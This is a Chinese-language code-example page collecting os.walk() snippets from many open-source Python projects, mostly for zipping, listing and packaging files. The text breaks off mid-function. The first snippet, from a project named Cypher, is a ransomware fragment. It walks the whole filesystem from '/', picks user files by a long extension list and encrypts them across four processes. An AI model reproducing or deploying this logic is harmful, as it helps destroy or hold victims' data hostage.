Python os 模块,walk() 实例源码

我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用os.walk()

项目:Cypher    作者:NullArray    | 项目源码 | 文件源码
def select_files():
    """Collect files by suffix from the whole filesystem and encrypt them.

    WARNING(review): destructive. The walk starts at "/" and every file whose
    name ends with one of the suffixes in ``ext`` is passed to
    ``single_arg_encrypt_file``. Do not run this outside an isolated
    analysis environment.
    """

    # File-name suffixes that select a file for encryption.
    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv", 
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe", 
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h", 
       ".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle",
       ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"]

    # Full paths of every matching file found below "/".
    files_to_enc = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(tuple(ext)):
                files_to_enc.append(os.path.join(root, file))

    # Parallelize execution of encryption function over four subprocesses
    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)
项目:AutoML5    作者:djajetic    | 项目源码 | 文件源码
def zipdir(archivename, basedir):
    '''Zip directory, from J.F. Sebastian http://stackoverflow.com/

    Writes every file found below ``basedir`` into the deflate-compressed
    archive ``archivename``. Entries are stored under their path relative
    to ``basedir``. Files whose name ends in ``.zip`` are skipped, and empty
    directories are not recorded.

    Raises AssertionError if ``basedir`` is not a directory.
    '''
    assert os.path.isdir(basedir)
    with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z:
        for root, dirs, files in os.walk(basedir):
            # NOTE: ignore empty directories
            for fn in files:
                if fn.endswith('.zip'):
                    continue
                absfn = os.path.join(root, fn)
                # relpath (instead of slicing off len(basedir) + 1 characters)
                # stays correct when basedir already ends with a separator.
                z.write(absfn, os.path.relpath(absfn, basedir))

# ================ Inventory input data and create data structure =================
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def zip_dir(directory):
    """Pack every file below ``directory`` into an in-memory zip archive.

    Returns the ``io.BytesIO`` buffer the archive was written to.
    """
    buffer = io.BytesIO()
    prefix_len = len(directory)
    with ZipFile(buffer, "w") as archive:
        for folder, _subdirs, filenames in os.walk(directory):
            # Portion of the walked path that follows the ``directory`` prefix.
            tail = folder[prefix_len:]
            for filename in filenames:
                archive.write(os.path.join(folder, filename),
                              os.path.join(tail, filename))
    return buffer

#
# Simple progress bar
#
项目:pynini    作者:daffidilly    | 项目源码 | 文件源码
def load_data(self):
    """Load every recognised data file under the pages directory.

    Changes the working directory to the parent of ``self.setup.pages_dir``
    and walks the pages directory from there. Each file whose extension is
    in ``self.setup.data_extensions`` is read with the loader registered
    for that extension, and the result is stored in ``self.data`` under the
    file's relative path without its extension.

    Raises SetupError when a matching extension has no loader.
    """
    # work in the parent of the pages directory, because we
    # want the filenames to begin "pages/...".
    chdir(dirname(self.setup.pages_dir))
    pages_root = relpath(self.setup.pages_dir)
    for folder, _subdirs, filenames in walk(pages_root):
        for filename in filenames:
            stem, suffix = splitext(filename)
            if suffix not in self.setup.data_extensions:
                continue
            loader = self.setup.data_loaders.get(suffix)
            if not loader:
                raise SetupError("Identified data file '%s' by type '%s' but no loader found" % (filename, suffix))
            self.data[join(folder, stem)] = loader.loadf(join(folder, filename))
项目:gimel    作者:Alephbet    | 项目源码 | 文件源码
def prepare_zip():
    """Create or overwrite ``gimel.zip`` in the current directory.

    The archive receives a ``config.json`` entry holding the serialised
    ``config`` object, the three package modules ``config.py``, ``gimel.py``
    and ``logger.py``, and every file under the package's ``vendor``
    resource directory (stored relative to the package root).
    """
    from pkg_resources import resource_filename as resource
    from config import config
    from json import dumps
    logger.info('creating/updating gimel.zip')
    with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf:
        config_entry = ZipInfo('config.json')
        config_entry.external_attr = 0o664 << 16
        zipf.writestr(config_entry, dumps(config))
        for module_name in ('config.py', 'gimel.py', 'logger.py'):
            zipf.write(resource('gimel', module_name), module_name)
        for folder, _subdirs, filenames in os.walk(resource('gimel', 'vendor')):
            for filename in filenames:
                source = os.path.join(folder, filename)
                zipf.write(source,
                           os.path.relpath(source, resource('gimel', '')))
项目:Stitch    作者:nathanlopez    | 项目源码 | 文件源码
def zipdir(path, zipn):
    """Add every file found under ``path`` to the open archive ``zipn``.

    Each file is written under the path produced by the walk, so entry names
    include ``path`` itself.
    """
    for folder, _subdirs, filenames in os.walk(path):
        targets = [os.path.join(folder, filename) for filename in filenames]
        for target in targets:
            zipn.write(target)
项目:rstviewer    作者:arne-cl    | 项目源码 | 文件源码
def gen_data_files(src_dir):
    """
    List every file below ``src_dir`` (recursively) in the format required
    by the ``package_data`` parameter of ``setuptools.setup``.

    Parameters
    ----------
    src_dir : str
        (relative) path to the directory structure containing the files to
        be included in the package distribution

    Returns
    -------
    fpaths : list(str)
        file paths, each relative to the parent directory of ``src_dir``
    """
    parent = os.path.dirname(src_dir)
    return [
        os.path.relpath(os.path.join(folder, filename), parent)
        for folder, _subdirs, filenames in os.walk(src_dir)
        for filename in filenames
    ]
项目:Starfish    作者:BillWang139967    | 项目源码 | 文件源码
def clearpyc(root, patterns='*',single_level=False, yield_folders=False):
    """
    Yield the paths under ``root`` whose base name matches ``patterns``.

    Despite its name this generator only yields paths; it deletes nothing.

    root: directory to start walking from
    patterns: semicolon-separated fnmatch-style patterns; whitespace around
        each pattern is ignored
    single_level: if true, only ``root`` itself is examined (no recursion)
    yield_folders: if true, sub-directory names are matched and yielded too
    """
    patterns = [pattern.strip() for pattern in patterns.split(';')]
    for path, subdirs, files in os.walk(root):
        if yield_folders:
            files.extend(subdirs)
            files.sort()
        for name in files:
            # any() stops at the first matching pattern, so a name that
            # matches several patterns is yielded exactly once.
            if any(fnmatch.fnmatch(name, pattern) for pattern in patterns):
                yield os.path.join(path, name)
        if single_level:
            break
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def get_distribution_names(self):
    """
    Return the set of distribution names found under ``self.base_dir``.

    Only files accepted by ``self.should_include`` are considered. When
    ``self.recursive`` is false, only the top directory is examined.
    """
    names = set()
    for folder, _subdirs, filenames in os.walk(self.base_dir):
        for filename in filenames:
            if not self.should_include(filename, folder):
                continue
            location = os.path.abspath(os.path.join(folder, filename))
            file_url = urlunparse(('file', '', pathname2url(location),
                                   '', '', ''))
            info = self.convert_url_to_download_info(file_url, None)
            if info:
                names.add(info['name'])
        if not self.recursive:
            break
    return names
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def test_pydist():
    """Make sure pydist.json exists and validates against our schema.

    Walks the ``simple.dist`` and ``complex-dist`` test resources, opens
    every ``.whl`` found and validates each ``metadata.json`` entry against
    ``pydist-schema.json``. Fails if no metadata file was validated.
    """
    # XXX this test may need manual cleanup of older wheels

    import jsonschema

    def open_json(filename):
        # Close the handle deterministically instead of leaking it.
        with open(filename, 'rb') as handle:
            return json.loads(handle.read().decode('utf-8'))

    pymeta_schema = open_json(resource_filename('wheel.test',
                                                'pydist-schema.json'))
    valid = 0
    for dist in ("simple.dist", "complex-dist"):
        basedir = pkg_resources.resource_filename('wheel.test', dist)
        for (dirname, subdirs, filenames) in os.walk(basedir):
            for filename in filenames:
                if not filename.endswith('.whl'):
                    continue
                # The context manager closes the wheel even when validation
                # raises part-way through.
                with ZipFile(os.path.join(dirname, filename)) as whl:
                    for entry in whl.infolist():
                        if entry.filename.endswith('/metadata.json'):
                            pymeta = json.loads(whl.read(entry).decode('utf-8'))
                            jsonschema.validate(pymeta, pymeta_schema)
                            valid += 1
    assert valid > 0, "No metadata.json found"
项目:pynini    作者:daffidilly    | 项目源码 | 文件源码
def get_all_pages(self):
    """Yield a ``Page`` for every template file under the pages directory.

    Changes the working directory to the parent of ``self.setup.pages_dir``
    so that the walked paths start with the pages directory's own name.
    A file counts as a template when its extension is listed in
    ``self.setup.template_extensions``.
    """
    # work in the parent of the pages directory, because we
    # want the filenames to begin "pages/...".
    chdir(dirname(self.setup.pages_dir))
    pages_root = relpath(self.setup.pages_dir)

    # Example walk results:
    #
    #  folder='pages'                folder='pages/categories'
    #  filenames=['index.html']      filenames=['list.html']
    for folder, _subdirs, filenames in walk(pages_root):
        for filename in filenames:
            _stem, suffix = splitext(filename)
            if suffix not in self.setup.template_extensions:
                continue
            yield Page(self.setup, filename, join(folder, filename))
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def get_distribution_names(self):
    """
    Gather the names of all distributions this locator can see.

    Walks ``self.base_dir``; stops after the first directory when
    ``self.recursive`` is false. Files rejected by ``self.should_include``
    are ignored.
    """
    found = set()
    for current, _children, entries in os.walk(self.base_dir):
        accepted = [e for e in entries if self.should_include(e, current)]
        for entry in accepted:
            absolute = os.path.abspath(os.path.join(current, entry))
            url = urlunparse(('file', '', pathname2url(absolute), '', '', ''))
            info = self.convert_url_to_download_info(url, None)
            if info:
                found.add(info['name'])
        if not self.recursive:
            break
    return found
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def zip_dir(directory):
    """Zip the tree rooted at ``directory`` and return it as a BytesIO."""
    stream = io.BytesIO()
    skip = len(directory)
    with ZipFile(stream, "w") as zf:
        for current, _children, entries in os.walk(directory):
            # Part of the walked path that follows the ``directory`` prefix.
            inner = current[skip:]
            for entry in entries:
                source = os.path.join(current, entry)
                zf.write(source, os.path.join(inner, entry))
    return stream

#
# Simple progress bar
#
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def unpack_directory(filename, extract_dir, progress_filter=default_filter):
    """Copy a directory tree using the same interface as the archive unpackers.

    For every file, ``progress_filter`` is called with the '/'-separated
    path relative to ``filename`` and the proposed destination; a falsy
    return value skips the file, any other value is used as the target.

    Raises ``UnrecognizedFormat`` if `filename` is not a directory
    """
    if not os.path.isdir(filename):
        raise UnrecognizedFormat("%s is not a directory" % filename)

    # Maps each walked directory to (relative '/'-prefix, destination dir).
    mapping = {filename: ('', extract_dir)}
    for current, subdirs, entries in os.walk(filename):
        prefix, dest_dir = mapping[current]
        for sub in subdirs:
            mapping[os.path.join(current, sub)] = (prefix + sub + '/',
                                                   os.path.join(dest_dir, sub))
        for entry in entries:
            target = progress_filter(prefix + entry,
                                     os.path.join(dest_dir, entry))
            if target:
                ensure_directory(target)
                source = os.path.join(current, entry)
                shutil.copyfile(source, target)
                shutil.copystat(source, target)
项目:picoCTF    作者:picoCTF    | 项目源码 | 文件源码
def find_problems(problem_path):
    """
    Locate every problem directory beneath the given root.

    A directory counts as a problem directory when it contains a file named
    problem.json and its path does not contain "__staging".

    Args:
        problem_path: the directory to search
    Returns:
        A list of paths of the matching directories.
    """

    return [
        folder
        for folder, _, filenames in os.walk(problem_path)
        if "problem.json" in filenames and "__staging" not in folder
    ]
项目:picoCTF    作者:picoCTF    | 项目源码 | 文件源码
def files_from_directory(directory, recurse=True, permissions=0o664):
    """
    Build a File object for each file in a directory, optionally recursing.

    Args:
        directory: The directory to add files from
        recurse: Whether or not to recursively add files. Defaults to true
        permissions: The permissions passed to each File. Defaults to 0o664.
    Returns:
        A list of File objects.
    """

    collected = []
    for folder, _subdirs, names in os.walk(directory):
        collected.extend(File(join(folder, name), permissions)
                         for name in names)
        if not recurse:
            # Only the top directory was requested.
            break
    return collected
项目:polyaxon-cli    作者:polyaxon    | 项目源码 | 文件源码
def get_unignored_file_paths(cls, ignore_list=None, white_list=None):
    """Return the paths under "." that are not ignored.

    ``ignore_list`` and ``white_list`` fall back to the first and second
    element of ``cls.get_config()`` when falsy. A directory that is ignored
    is not descended into.
    """
    config = cls.get_config()
    ignore_list = ignore_list or config[0]
    white_list = white_list or config[1]
    kept = []

    for root, dirs, files in os.walk("."):
        logger.debug("Root:%s, Dirs:%s", root, dirs)

        if cls._ignore_path(unix_style_path(root), ignore_list, white_list):
            # Emptying the list in place stops os.walk from descending.
            del dirs[:]
            logger.debug("Ignoring directory : %s", root)
            continue

        for file_name in files:
            joined = os.path.join(root, file_name)
            if cls._ignore_path(unix_style_path(joined), ignore_list, white_list):
                logger.debug("Ignoring file : %s", file_name)
            else:
                kept.append(joined)

    return kept
项目:core-framework    作者:RedhawkSDR    | 项目源码 | 文件源码
def __processDir(self):
    """
    Collect Makefiles from the target directory, descending into all
    sub-directories when recursion is enabled.
    """
    self.__log("Processing directory %s" % self.__tgt)

    if not self.__recurse:
        # just care to find Makefiles in this directory
        if __PATTERN__ in os.listdir(self.__tgt):
            fname = os.path.join(self.__tgt, __PATTERN__)
            self.__log("Appending %s to the list" % fname)
            self.__make_files.append(fname)
        return

    # recursing: walk the whole tree
    for (path, dirs, files) in os.walk(self.__tgt):
        for curr_file in files:
            # only files named exactly like the pattern are queued
            if curr_file != __PATTERN__:
                continue
            fname = os.path.join(path, curr_file)
            self.__make_files.append(fname)
            self.__log("Adding %s to list" % fname)
项目:mysql-er    作者:StefanLim0    | 项目源码 | 文件源码
def get_sqls(self):
    """Extract the SQL statements embedded in the Java files under ``self.dir``.

    Every ``.java`` file is decoded with ``self.encoding``, stripped of
    comments and scanned for select statements.

    Returns:
       A list of :class:`SQL`. For example:
       [SQL('', u'select a.id, b.name from db.ac a join db.bc b on a.id=b.id or a.id=b.iid where a.cnt > 10')]

    """
    collected = []
    for folder, _subdirs, filenames in os.walk(self.dir):
        for filename in filenames:
            if filename.endswith('.java'):
                java_path = os.path.join(folder, filename)
                with codecs.open(java_path, 'r', encoding=self.encoding) as handle:
                    stripped = MybatisInlineSqlExtractor.remove_comment(handle.read())
                    collected.extend(
                        MybatisInlineSqlExtractor.get_selects_from_text(stripped))
    return collected
项目:kinect-2-libras    作者:inessadl    | 项目源码 | 文件源码
def refactor_dir(self, dir_name, write=False, doctests_only=False):
    """Walk a directory tree and refactor each Python file in it.

    A file is treated as Python when its extension is ``.py``.

    Files and subdirectories whose names start with '.' are skipped.
    """
    wanted_ext = os.extsep + "py"
    for dirpath, dirnames, filenames in os.walk(dir_name):
        self.log_debug("Descending into %s", dirpath)
        dirnames.sort()
        filenames.sort()
        for name in filenames:
            if name.startswith("."):
                continue
            if os.path.splitext(name)[1] != wanted_ext:
                continue
            self.refactor_file(os.path.join(dirpath, name),
                               write, doctests_only)
        # Prune dot-directories in place so os.walk does not enter them.
        dirnames[:] = [sub for sub in dirnames if not sub.startswith(".")]
项目:kinect-2-libras    作者:inessadl    | 项目源码 | 文件源码
def remove_folder(self, folder):
    """Delete the named folder, which must be empty.

    Raises NotEmptyError if ``new`` or ``cur`` holds an entry that does not
    start with '.', or if the folder has a sub-directory other than
    ``new``, ``cur`` and ``tmp``.
    """
    path = os.path.join(self._path, '.' + folder)
    messages = (os.listdir(os.path.join(path, 'new')) +
                os.listdir(os.path.join(path, 'cur')))
    for entry in messages:
        if not entry.startswith('.'):
            raise NotEmptyError('Folder contains message(s): %s' % folder)
    for entry in os.listdir(path):
        if entry in ('new', 'cur', 'tmp'):
            continue
        if os.path.isdir(os.path.join(path, entry)):
            raise NotEmptyError("Folder contains subdirectory '%s': %s" %
                                (folder, entry))
    # Bottom-up walk: children are removed before their parent directory.
    for root, dirs, files in os.walk(path, topdown=False):
        for leaf in files:
            os.remove(os.path.join(root, leaf))
        for leaf in dirs:
            os.rmdir(os.path.join(root, leaf))
    os.rmdir(path)
项目:conv2mp4-py    作者:Kameecoding    | 项目源码 | 文件源码
def find_media_files(media_path):
    """Return a sorted list of video and subtitle file paths under ``media_path``.

    Hidden files (names starting with '.') are skipped, as are paths that
    match the case-insensitive regex ".sample.".
    """
    found = []

    for dirname, directories, files in os.walk(media_path):
        for file in files:
            # skip hidden files
            if file.startswith('.'):
                continue
            if not (is_video(file) or is_subtitle(file)):
                continue
            full_path = os.path.join(dirname, file)
            # Skip Sample files. NOTE: the dots are regex wildcards and the
            # pattern is applied to the full path, not just the file name.
            if re.search(".sample.", full_path, re.I):
                continue
            found.append(full_path)

    found.sort()
    return found
项目:bnn-analysis    作者:myshkov    | 项目源码 | 文件源码
def get_latest_data_subdir(pattern=None, take=-1):
    """Pick a sub-directory of ``BASE_DATA_DIR`` by modification time.

    The immediate sub-directories are ordered oldest to newest by mtime and
    the one at index ``take`` is returned (the newest by default). When
    ``pattern`` is given, only names containing it are considered.

    Returns None when the walk yields nothing or no sub-directory remains.
    """
    try:
        _top, subdirs, _files = next(os.walk(BASE_DATA_DIR))
    except StopIteration:
        return None

    if pattern is not None:
        subdirs = [name for name in subdirs if pattern in name]

    ordered = sorted(
        subdirs,
        key=lambda name: os.stat(os.path.join(BASE_DATA_DIR, name)).st_mtime)
    if not ordered:
        return None

    return ordered[take]
项目:conv2mp4-py    作者:BrianDMG    | 项目源码 | 文件源码
def garbage_collection():
    """Delete every file under ``media_path`` whose name ends with ``garbage``.

    Updates the module globals ``garbage_count`` (number of files removed)
    and ``garbage_list`` (numbered, newline-separated list of their paths),
    then prints a summary followed by the list.
    """
    global garbage_count, garbage_list
    garbage_count = 0
    garbage_list = ''
    for root, dirs, targets in os.walk(media_path):
        for target_name in targets:
            if target_name.endswith(garbage):
                garbage_count += 1
                fullpath = os.path.normpath(os.path.join(str(root), str(target_name)))
                garbage_list = garbage_list + "\n" + (str(garbage_count) + ': ' + fullpath)
                os.remove(fullpath)
    if garbage_count == 0:
        print("\nGarbage Collection: There was no garbage found!")
    elif garbage_count == 1:
        print("\nGarbage Collection: The following file was deleted:")
    else:
        print("\nGarbage Collection: The following " + str(garbage_count) + " files were deleted:")
    # Function-call form works on both Python 2 and 3; the bare
    # ``print x`` statement is a SyntaxError on Python 3.
    print(garbage_list)


# Log various session statistics
项目:dogs-vs-cats    作者:yaricom    | 项目源码 | 文件源码
def list_image(root, recursive, exts):
    """Yield ``(index, path relative to root, label)`` for each matching file.

    A file matches when it is a regular file whose lower-cased extension is
    in ``exts``. Without ``recursive`` only ``root`` itself is listed and the
    label is always 0. With ``recursive`` the tree is walked (following
    links) in sorted order, each directory containing a match gets the next
    integer label, and the directory/label pairs are printed once the walk
    is finished.
    """
    index = 0
    if not recursive:
        for fname in sorted(os.listdir(root)):
            fpath = os.path.join(root, fname)
            suffix = os.path.splitext(fname)[1].lower()
            if os.path.isfile(fpath) and (suffix in exts):
                yield (index, os.path.relpath(fpath, root), 0)
                index += 1
        return

    labels = {}
    for path, dirs, files in os.walk(root, followlinks=True):
        dirs.sort()
        files.sort()
        for fname in files:
            fpath = os.path.join(path, fname)
            suffix = os.path.splitext(fname)[1].lower()
            if not (os.path.isfile(fpath) and (suffix in exts)):
                continue
            # First match in a directory assigns it the next free label.
            label = labels.setdefault(path, len(labels))
            yield (index, os.path.relpath(fpath, root), label)
            index += 1
    for folder, label in sorted(labels.items(), key=lambda item: item[1]):
        print(os.path.relpath(folder, root), label)
项目:pyseeder    作者:PurpleI2P    | 项目源码 | 文件源码
def reseed(self, netdb):
    """Zip the netDb entries under ``netdb`` and store them as the content.

    All ``.dat`` files below ``netdb`` are candidates; when there are more
    than 75, a random sample of 75 is used. The files are deflated into an
    in-memory archive under their base names.

    Raises PyseederException when no ``.dat`` file is found.
    """
    # TODO check modified time
    # may be not older than 10h
    candidates = [
        os.path.join(root, name)
        for root, dirs, files in os.walk(netdb)
        for name in files
        if name.endswith(".dat")
    ]

    if not candidates:
        raise PyseederException("Can't get enough netDb entries")
    if len(candidates) > 75:
        candidates = random.sample(candidates, 75)

    archive = io.BytesIO()
    with ZipFile(archive, "w", compression=ZIP_DEFLATED) as zf:
        for entry in candidates:
            zf.write(entry, arcname=os.path.basename(entry))

    self.FILE_TYPE = 0x00
    self.CONTENT_TYPE = 0x03
    self.CONTENT = archive.getvalue()
    self.CONTENT_LENGTH = len(self.CONTENT)
项目:QUANTAXIS    作者:yutiansut    | 项目源码 | 文件源码
def QA_save_tdx_to_mongo(file_dir, client=QA_Setting.client):
    """Load 5-minute bar files found under ``file_dir`` into MongoDB.

    Only files whose names start with ``sh6``, ``sz0`` or ``sz3`` are
    processed. Each file is read with ``TdxMinBarReader``, annotated with
    code, market, datetime/date strings and their stamps, and inserted into
    the ``quantaxis.stock_min_five`` collection of ``client``.

    :param file_dir: directory to walk for bar files
    :param client: Mongo client providing ``quantaxis.stock_min_five``
    """
    reader = TdxMinBarReader()
    __coll = client.quantaxis.stock_min_five
    # Market prefix plus the first digit of the code. A prefix test cannot
    # raise on names with a non-digit (or missing) third character.
    wanted_prefixes = ('sh6', 'sz0', 'sz3')
    for root, _dirs, files in os.walk(file_dir):

        for file in files:
            name = str(file)
            if not name.startswith(wanted_prefixes):
                continue

            QA_util_log_info('Now_saving ' + name[2:8] + '\'s 5 min tick')
            # Join with the directory being walked so files in
            # sub-directories resolve, and so the separator is portable.
            fname = os.path.join(root, name)
            df = reader.get_df(fname)
            df['code'] = name[2:8]
            df['market'] = name[0:2]
            df['datetime'] = [str(x) for x in list(df.index)]
            df['date'] = [str(x)[0:10] for x in list(df.index)]
            df['time_stamp'] = df['datetime'].apply(
                lambda x: QA_util_time_stamp(x))
            df['date_stamp'] = df['date'].apply(
                lambda x: QA_util_date_stamp(x))
            data_json = json.loads(df.to_json(orient='records'))
            __coll.insert_many(data_json)
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def get_distribution_names(self):
    """
    Return the names of all distributions located under ``self.base_dir``.

    Sub-directories are searched only when ``self.recursive`` is true, and
    only files for which ``self.should_include`` is true are inspected.
    """
    collected = set()
    for dirpath, _dirnames, filenames in os.walk(self.base_dir):
        for candidate in filenames:
            if self.should_include(candidate, dirpath):
                full = os.path.join(dirpath, candidate)
                url_path = pathname2url(os.path.abspath(full))
                info = self.convert_url_to_download_info(
                    urlunparse(('file', '', url_path, '', '', '')), None)
                if info:
                    collected.add(info['name'])
        if not self.recursive:
            break
    return collected
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def zip_dir(directory):
    """Return a BytesIO holding a zip of all files under ``directory``."""
    out = io.BytesIO()
    offset = len(directory)
    with ZipFile(out, "w") as zf:
        for dirpath, _dirnames, filenames in os.walk(directory):
            for filename in filenames:
                # Archive name: walked path after the ``directory`` prefix,
                # joined with the file name.
                arcname = os.path.join(dirpath[offset:], filename)
                zf.write(os.path.join(dirpath, filename), arcname)
    return out

#
# Simple progress bar
#
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def create_zipfile(self, filename):
    """Zip the contents of ``self.target_dir`` into ``filename``.

    Entries are stored relative to ``self.target_dir``.

    Raises DistutilsOptionError when the top level of the target directory
    contains no files. The archive is closed in every case.
    """
    with zipfile.ZipFile(filename, "w") as zip_file:
        self.mkpath(self.target_dir)  # just in case
        for root, dirs, files in os.walk(self.target_dir):
            if not files and root == self.target_dir:
                raise DistutilsOptionError(
                    "no files found in upload directory '%s'"
                    % self.target_dir)
            # Path of this directory relative to the target directory.
            relative = root[len(self.target_dir):].lstrip(os.path.sep)
            for name in files:
                zip_file.write(os.path.join(root, name),
                               os.path.join(relative, name))
项目:Flask_Blog    作者:sugarguo    | 项目源码 | 文件源码
def unpack_directory(filename, extract_dir, progress_filter=default_filter):
    """Copy a directory tree through the archive-unpacking interface.

    ``progress_filter`` receives each file's '/'-separated path relative to
    ``filename`` together with the proposed destination; it returns the
    destination to use, or a falsy value to skip the file.

    Raises ``UnrecognizedFormat`` if `filename` is not a directory
    """
    if not os.path.isdir(filename):
        raise UnrecognizedFormat("%s is not a directory" % (filename,))

    # Maps each walked directory to (relative '/'-prefix, destination dir).
    locations = {filename: ('', extract_dir)}
    for base, dirs, files in os.walk(filename):
        rel_prefix, out_dir = locations[base]
        for child in dirs:
            locations[os.path.join(base, child)] = (
                rel_prefix + child + '/', os.path.join(out_dir, child))
        for leaf in files:
            target = progress_filter(rel_prefix + leaf,
                                     os.path.join(out_dir, leaf))
            if not target:
                continue    # skip non-files
            ensure_directory(target)
            origin = os.path.join(base, leaf)
            shutil.copyfile(origin, target)
            shutil.copystat(origin, target)
项目:charm-plumgrid-gateway    作者:openstack    | 项目源码 | 文件源码
def ensure_init(path):
    '''
    Create any missing ``__init__.py`` files below the directory formed by
    the first two '/'-separated components of ``path``, eg for
    path='hooks/helpers/foo':
        hooks/helpers/__init__.py
        hooks/helpers/foo/__init__.py
    '''
    top = os.path.join(*path.split('/')[:2])
    for folder, _dirs, _files in os.walk(top):
        marker = os.path.join(folder, '__init__.py')
        if os.path.exists(marker):
            continue
        logging.info('Adding missing __init__.py: %s' % marker)
        # Create an empty file.
        open(marker, 'wb').close()
项目:charm-plumgrid-gateway    作者:openstack    | 项目源码 | 文件源码
def chownr(path, owner, group, follow_links=True, chowntopdir=False):
    """Recursively set the owner and group of everything below ``path``.

    ``path`` itself is only changed when ``chowntopdir`` is true. Broken
    symlinks are left untouched.

    :param str path: The string path to start changing ownership.
    :param str owner: The owner string to use when looking up the uid.
    :param str group: The group string to use when looking up the gid.
    :param bool follow_links: Use ``os.chown`` if True, ``os.lchown`` if not
    :param bool chowntopdir: Also chown path itself if True
    """
    uid = pwd.getpwnam(owner).pw_uid
    gid = grp.getgrnam(group).gr_gid
    chown = os.chown if follow_links else os.lchown

    def _is_broken_symlink(target):
        # The link exists, but what it points at does not.
        return os.path.lexists(target) and not os.path.exists(target)

    if chowntopdir and not _is_broken_symlink(path):
        chown(path, uid, gid)
    for root, dirs, files in os.walk(path):
        for name in dirs + files:
            full = os.path.join(root, name)
            if not _is_broken_symlink(full):
                chown(full, uid, gid)
项目:Stitch    作者:nathanlopez    | 项目源码 | 文件源码
def get_dir_size(start_path = '.'):
    """Return the combined size in bytes of all files below ``start_path``."""
    return sum(
        os.path.getsize(os.path.join(dirpath, name))
        for dirpath, _dirnames, filenames in os.walk(start_path)
        for name in filenames
    )
项目:PhonePerformanceMeasure    作者:KyleCe    | 项目源码 | 文件源码
def get_apk_file_in_path(path):
    """Return the paths of all files under ``path`` ending with ``Res.pgk_suffix``."""
    return [
        os.path.join(parent, filename)
        for parent, _dir_names, filenames in os.walk(path)
        for filename in filenames
        if filename.endswith(Res.pgk_suffix)
    ]
项目:Switch-Screenshots    作者:RenanGreca    | 项目源码 | 文件源码
def list_images(dir):
    """Return paths of files under ``dir`` whose name contains "jpg" or "mp4".

    The test is a substring match on the file name, not an extension check.
    """
    return [
        os.path.join(root, name)
        for root, _dirs, files in os.walk(dir)
        for name in files
        if "jpg" in name or "mp4" in name
    ]

# Load game IDs file
项目:django-notifs    作者:danidee10    | 项目源码 | 文件源码
def package_files(directory):
    """Recursively list the files under ``directory``, each prefixed with '..'."""
    return [
        os.path.join('..', path, filename)
        for (path, _directories, filenames) in os.walk(directory)
        for filename in filenames
    ]
项目:xr-telemetry-m2m-web    作者:cisco    | 项目源码 | 文件源码
def maybe_load_scriptlets(cfg):
    """Populate the module-level ``scriptlets`` mapping on first use.

    Does nothing when ``scriptlets`` is already set. Otherwise every file
    under ``<cfg['assets']>/scriptlets`` is read and stored in an
    OrderedDict. A file name matching ``_<name>.py`` is keyed by ``<name>``;
    any other file is keyed by its full file name.
    """
    # ``global`` has to precede any use of the name in the function body;
    # declaring it after the check is a SyntaxError on Python 3.
    global scriptlets
    if scriptlets is not None:
        return
    scriptlets = OrderedDict()
    scriptlet_dir = os.path.join(cfg['assets'], 'scriptlets')
    for root, dirs, files in os.walk(scriptlet_dir):
        for filename in files:
            # Close each file promptly instead of leaking the handle.
            with open(os.path.join(root, filename)) as handle:
                contents = handle.read()
            m = re.search(r'_(.*)\.py', filename)
            key = m.group(1) if m else filename
            scriptlets[key] = contents
项目:xr-telemetry-m2m-web    作者:cisco    | 项目源码 | 文件源码
def maybe_load_policies(cfg, policies_dict):
    """Add the contents of every policy file to ``policies_dict``.

    Reads each file under ``<cfg['assets']>/policies`` (recursively) and
    stores its text under the bare file name, overwriting any existing
    entry with that name. Returns the same ``policies_dict`` object.
    """
    # Update policies_dict with files found in /src/assets/policies
    policy_dir = os.path.join(cfg['assets'], 'policies')
    for root, dirs, files in os.walk(policy_dir):
        for filename in files:
            # Close each file promptly instead of leaking the handle.
            with open(os.path.join(root, filename)) as handle:
                policies_dict[filename] = handle.read()
    return policies_dict
项目:xr-telemetry-m2m-web    作者:cisco    | 项目源码 | 文件源码
def __init__(self, cfg):
    """Index the static assets under ``<cfg['assets']>/static``.

    ``self.files`` maps each bare file name to a ``File`` built from its
    full path. Names starting with '!' are left out.
    """
    static_dir = os.path.join(cfg['assets'], 'static')
    self.files = {}
    for root, dirs, files in os.walk(static_dir):
        visible = (name for name in files if not name.startswith('!'))
        for filename in visible:
            self.files[filename] = File(os.path.join(root, filename))
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def _get_project(self, name):
        result = {'urls': {}, 'digests': {}}
        for root, dirs, files in os.walk(self.base_dir):
            for fn in files:
                if self.should_include(fn, root):
                    fn = os.path.join(root, fn)
                    url = urlunparse(('file', '',
                                      pathname2url(os.path.abspath(fn)),
                                      '', '', ''))
                    info = self.convert_url_to_download_info(url, name)
                    if info:
                        self._update_version_data(result, info)
            if not self.recursive:
                break
        return result
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def _iglob(path_glob):
    rich_path_glob = RICH_GLOB.split(path_glob, 1)
    if len(rich_path_glob) > 1:
        assert len(rich_path_glob) == 3, rich_path_glob
        prefix, set, suffix = rich_path_glob
        for item in set.split(','):
            for path in _iglob(''.join((prefix, item, suffix))):
                yield path
    else:
        if '**' not in path_glob:
            for item in std_iglob(path_glob):
                yield item
        else:
            prefix, radical = path_glob.split('**', 1)
            if prefix == '':
                prefix = '.'
            if radical == '':
                radical = '*'
            else:
                # we support both
